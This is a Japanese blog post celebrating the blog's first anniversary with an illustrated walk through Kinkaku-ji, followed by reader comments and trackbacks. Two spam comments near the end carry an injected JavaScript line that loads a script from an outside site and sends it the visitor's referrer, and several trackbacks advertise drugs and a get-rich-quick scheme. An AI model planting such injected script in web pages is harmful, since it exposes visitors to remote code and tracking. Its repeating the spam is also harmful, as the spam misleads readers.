« 香川で得た教訓ノ拾壱『香川の商店街は京都と比べて人通りは少ないくせに無駄に横幅が広い』 | トップページ | 香川で得た教訓ノ拾弐『香川は意外と神明鳥居が多い。』 »

2007年2月20日 (火曜日)

長い…もう二度とこんなのは作らないだろうな。

今日はちょっとした特別な日なのですが…何の日か分かりますか? サイドバーの一番右下を見れば分かると思いますが、実は、今日がこのブログの誕生日なんですよ! 気が付いたら一周年になっていました。   このブログでは少しずつ京都の紹介をしていましたが、一周年記念ということで今回はちょっと豪華サイズで金閣寺を。京都のことを紹介するのだったら金閣は最初の方にするべきなのですが、今日いっぺんに写真を公開しようと思っていたので、あえてあまり出しませんでした。

金閣寺は正式名称、「北山鹿苑寺」。その中の舎利殿である金閣が有名になったため、今では当たり前のように「金閣寺」と呼ばれています。銀閣とほとんど境遇が一緒ですね。 知っての通り室町時代、足利義満が立てさせたものです。Imi_3467a

.

.

.

.

.

.

門を入ると、しばらく砂利道を歩きます。これだけ以前、紅葉の時期に撮ったものです。何せこの風景だけ写真撮るのを忘れていたもので…。

P1000347 .

.

.

.

.

.

.

朝6時になると、この鐘楼から鐘の音が自分の家にまで聞こえてきます。もう少し歩くと、あの金ピカの建物が見えてきますよ。

ここは銀閣と同じ、池泉回遊式庭園です。順路通りに写真を載せていきます。

P1000348

.

.

.

.

.

.

.

中門を抜けると一番最初に見えてくるのが金閣、舎利殿です。 二層と三層は、漆の上から純金の箔が張ってあり、屋根柿葺で、上には中国でめでたい鳥といわれる鳳凰が輝いています。三島由紀夫の「金閣寺」という小説を読んだことがある人は知っていると思いますが、昭和、痛々しい事件があったんですよ。

P1000349 .

.

.

.

.

.

.

鏡湖池の中には坂さの金閣が。池の中心には葦原島という島があり、そこにはいくつもの松や石が置かれてあって特別名勝にもなっています。

.

_061.

.

.

.

.

.

.

てっぺんには鳳凰。南を向いています。

P1000350 .

.

.

.

.

.

Dsc06178a_1.

.

.

.

.

.

.

鏡湖池を越えると、裏から見ることが出来ます。ここからは金閣から離れるように道が続いています。庭園を見ていきましょう。

Dsc06180a

P1000352.

.

.

.

.

.

.

道なりに北山を登ります。階段がちょっと辛い……。

._062

.

.

.

.

.

.

.

鯉魚石。鯉の滝登りをイメージしているらしいです。元はもちろん、鯉が登りきると龍に化するといわれる中国の故事。知ってますよね。

Dsc06192b_1.

.

.

.

.

.

.

.

三畳ほどの茶室、夕佳亭。修学院を造営した後水尾上皇の為に、傾きかけた金閣を復興して池泉庭を修復した鳳林承章が茶道家、金森宗和に造らせたものです。

P1000353 .

.

.

.

.

.

.

安民沢(あんみんたく) という池です。日照りが続いても涸れないので雨乞いの場ともされていました。中心の島にあるのは白蛇の塚といいます。

.Dsc06189a

.

.

.

.

.

.

.

さらに山を登っていきます。随分高いところまで来ました。

_064 .

.

.

.

.

.

.

不動堂。本尊は弘法大師が作られたと伝えられる石不動明王。不動堂の後ろには、独鈷水(どっこすい)という井戸があります。ここを抜けると出口です。お疲れ様でした♪

_065 .

.

.

.

.

.

.

お楽しみいただけましたでしょうか。一周年企画ということで、かなりボリュームを上げてみました。なお、これからの京都カテゴリーではさらにマイナーなスポット、また違った風景の京都も紹介していく予定です。これからも引き続き、ヨロシク♪

|

« 香川で得た教訓ノ拾壱『香川の商店街は京都と比べて人通りは少ないくせに無駄に横幅が広い』 | トップページ | 香川で得た教訓ノ拾弐『香川は意外と神明鳥居が多い。』 »

コメント

とても見ごたえがあって楽しいブログですね☆
ところで「どこよ」っていうSNSを知っていますか?
最近友達に誘われて私もブログ書いてるんですけど、PCとも連動してて、携帯のGPS?機能で友達と待ち合わせしたり出来るらしいんです。
興味がありましたら見てみてください

投稿: ハルカ | 2007年2月20日 (火曜日) 午後 12時50分

一周年おめでとうございます。お互い長く続けていきましょう。
天気がいいおかげで金閣を始め周りの風景もいそう美しく見えますね。
最後の京の茶だんごがきになります。

投稿: ミラージュ | 2007年2月20日 (火曜日) 午後 02時43分

色々撮ってますね

投稿: 堕落 | 2007年2月25日 (日曜日) 午前 11時25分

ハルカさん>そう言っていただけるとは、嬉しい限りです。どこよ、見てみました。待ち合わせとかに便利そうです。出来れば友達に普及させてみたいところですが、そうするとサボリがばれるかな…。

ミラージュさん>撮影となると直接光が反射するために 天候はちょっと曇っているぐらいがちょうどいいのですが、金閣に限っては天気はよければいいほど映えて見えます。

堕落さん>ええ、もう画像がウリな物で(笑)

投稿: サヴァイヴ | 2007年3月 2日 (金曜日) 午前 12時33分

for tight shaved teen virgin MAO inhibitors buy ultram Dilacor that ativan Cialis another impotence diabetic diets top quality var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')

投稿: ativan | 2007年4月14日 (土曜日) 午前 02時30分

produces high debt recovery and the effects badcreditloans you office sex video sexually transmitted hypothek instructions especially var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')

投稿: debt recovery | 2007年4月15日 (日曜日) 午前 01時16分

コメントを書く



(ウェブ上には掲載しません)




トラックバック

この記事のトラックバックURL:
http://app.f.cocolog-nifty.com/t/trackback/52936/5320380

この記事へのトラックバック一覧です: 長い…もう二度とこんなのは作らないだろうな。:

» パズルをハメこむように出来る!パソコンど素人OLが0円資金で月収320万円になった方法!! [パソコンど素人OL]
私は、0円で出来る方法を選びました。最初の1ヶ月目は収入は10万円でしたが、実際10万円が手に入ったときの気持ちは、今でも忘れられません。会社でお給料をもらうのとは、別格のうれしさです。そこからの私は、来月には月収が100万円以上になることが確信できました。素人の私が確信できるほど、実感出来るんです。 予想通り、2ヶ月目は収入が153万円になりました。... [続きを読む]

受信: 2007年2月20日 (火曜日) 午後 01時07分

» 風水講談:トイレの神様−神様の世界その7 [風水日記−金運・幸運・大開運]
風水と明王の記事を追加いたしました。ご参考になれば幸いです。 [続きを読む]

受信: 2007年2月21日 (水曜日) 午後 07時44分

» Xanax lawsuits. [Xanax.]
Xanax. [続きを読む]

受信: 2007年3月25日 (日曜日) 午前 06時52分

« 香川で得た教訓ノ拾壱『香川の商店街は京都と比べて人通りは少ないくせに無駄に横幅が広い』 | トップページ | 香川で得た教訓ノ拾弐『香川は意外と神明鳥居が多い。』 »